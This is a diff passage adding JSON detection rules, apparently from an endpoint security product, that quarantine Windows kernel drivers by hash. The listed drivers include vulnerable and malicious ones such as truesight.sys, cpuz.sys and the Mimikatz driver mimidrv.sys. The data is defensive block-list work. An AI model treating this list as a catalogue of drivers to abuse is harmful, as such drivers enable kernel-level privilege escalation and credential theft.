+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473912Z",
+ "creation_date": "2026-03-23T11:45:30.473915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b56978dd0fc606668c0ed2698b3b22ef53dc6e4a676a4c5479438425d4e60a9",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e13e6e5d-d62a-562d-a1a5-c66500741f20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455136Z",
+ "creation_date": "2026-03-23T11:45:30.455140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0123c7f12dd7530d55aee49949ff1fee911c9689bd04591684aa641882589785",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e141ddae-7102-5721-bfa7-e36f20989306",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498063Z",
+ "creation_date": "2026-03-23T11:45:31.498067Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498076Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "148653ffa53559fdb98c87a1f562487ad6632d33fc76d57f696a5eba9cf5e9ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e14ec1cc-7658-5824-b7fe-4a3aee46c8d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146502Z",
+ "creation_date": "2026-03-23T11:45:32.146505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146514Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25819a8c8f2ebceef661d751a56a024a5584f8283d9600273e52d18923c9f455",
+ "comment": "Malicious Kernel Driver (aka f.sys) [https://www.loldrivers.io/drivers/17a1ad58-ecf3-4dea-b1ca-336880d15256/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e15496d7-da94-54cf-ac92-c8f109458674",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145912Z",
+ "creation_date": "2026-03-23T11:45:32.145914Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9f15d91397d1c8d01b6d6871c4f18f3a85ca85f091a92f4e9221524344ca5fe",
+ "comment": "Malicious Kernel Driver (aka driver_d9f15d91.sys) [https://www.loldrivers.io/drivers/576bb95a-f15e-4a0d-bcee-08791e1504e2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e15f2979-06b1-5cab-8cef-be42b7834720",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836282Z",
+ "creation_date": "2026-03-23T11:45:30.836285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "526d9241fcf4b67d9c11103a007f648e4f7acb5c82d6bc10df1d836c11d44a03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1607942-a038-5718-b613-8aa5fc4886ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606667Z",
+ "creation_date": "2026-03-23T11:45:29.606669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd15583e9503a6a5e37aa695a9625fe10abb0ea67f298ef529e0061d67aca99b",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e162139f-f7cc-50d7-80b3-875f45d23bb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981420Z",
+ "creation_date": "2026-03-23T11:45:29.981422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d8cfc9abea6d83dfea6da03260ff81be3b7b304321274f696ff0fdb9920c645",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e170d139-8d3a-58d0-bb5b-af7d4ca11b6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473059Z",
+ "creation_date": "2026-03-23T11:45:31.473062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473070Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccff824db4c41ee922e8f65035b198ae0d5a28861b3d1cf184a15bc90487ad6a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1720f4d-13c4-50de-b21a-d2ef141ca899",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472124Z",
+ "creation_date": "2026-03-23T11:45:30.472127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac1af529c9491644f1bda63267e0f0f35e30ab0c98ab1aecf4571f4190ab9db4",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e17b7f53-a818-54b0-aff3-0eaf76c8b300",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971821Z",
+ "creation_date": "2026-03-23T11:45:29.971823Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af7b9e3dca8fd4f9eb548bd06cf9f14dbce9f947fc375064aa90b47e7ee8940c",
+ "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e181caf6-5a5d-5f43-9fd8-212e8d61d575",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141664Z",
+ "creation_date": "2026-03-23T11:45:31.141665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7415b025a04d7c655815c27eff2c449ff2a88a2ed8ebede11ba705c87f5b6cbc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e18986d9-c37b-5317-a517-5819d5e8fd66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971282Z",
+ "creation_date": "2026-03-23T11:45:29.971286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45f42c5d874369d6be270ea27a5511efcca512aeac7977f83a51b7c4dee6b5ef",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1b17f61-2b1f-518e-9f81-cb0ece8062b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469629Z",
+ "creation_date": "2026-03-23T11:45:30.469632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f18cb98188952eb08367adc1c6810e4b1c3902240fdcb15efa0ffb1b69a5f98",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1b75aa4-8796-5d9e-86d1-ed431c9ef5c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621246Z",
+ "creation_date": "2026-03-23T11:45:29.621248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e",
+ "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1c9ff54-3610-5e58-bf7a-e7cf920d45de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489213Z",
+ "creation_date": "2026-03-23T11:45:31.489215Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489221Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ec994d3d1963e5ae76bee42edcb54357370e218c41a07851bf13ec0a3220d7f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1d37d52-0fea-5be7-bf93-50410832e083",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831677Z",
+ "creation_date": "2026-03-23T11:45:30.831679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e7da30faa89f8c902845f7907295541eb3d2f5d9f1a7cda6456255cfd3b3789",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1d46c39-3d2c-5fa3-a204-d1b72091b370",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830861Z",
+ "creation_date": "2026-03-23T11:45:30.830863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830880Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ceeff1bc2380597228991c7ac8f03a3106822e7fc93548ed0b48706355743e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1d61157-e381-54d7-b5da-0a6ca49dca2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499641Z",
+ "creation_date": "2026-03-23T11:45:31.499644Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499652Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7c2281f2a8c6b76a815a9e3ee68a3b4fcf0deaead3bf5c9784d6d75eae77135",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1e083b0-ba0e-59ce-8224-8af614b2fc4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465654Z",
+ "creation_date": "2026-03-23T11:45:30.465657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465666Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e858de280bd72d7538386a73e579580a6d5edba87b66b3671dc180229368be19",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1e1bf18-0874-54c4-b85a-472a4b53fa62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499188Z",
+ "creation_date": "2026-03-23T11:45:31.499191Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499200Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33a4755218bbe461ac13eb2adb2b32042afca0f6f357134624210e7e2a9ee30c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1f13007-332b-5996-b722-8d8a9d141a93",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478216Z",
+ "creation_date": "2026-03-23T11:45:31.478220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b2c503e6bed4a29973c7b27888a52216ee90a3db54aa9cd2ecabee04c028063",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e2085497-e760-5e9f-956a-243fd4a471b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
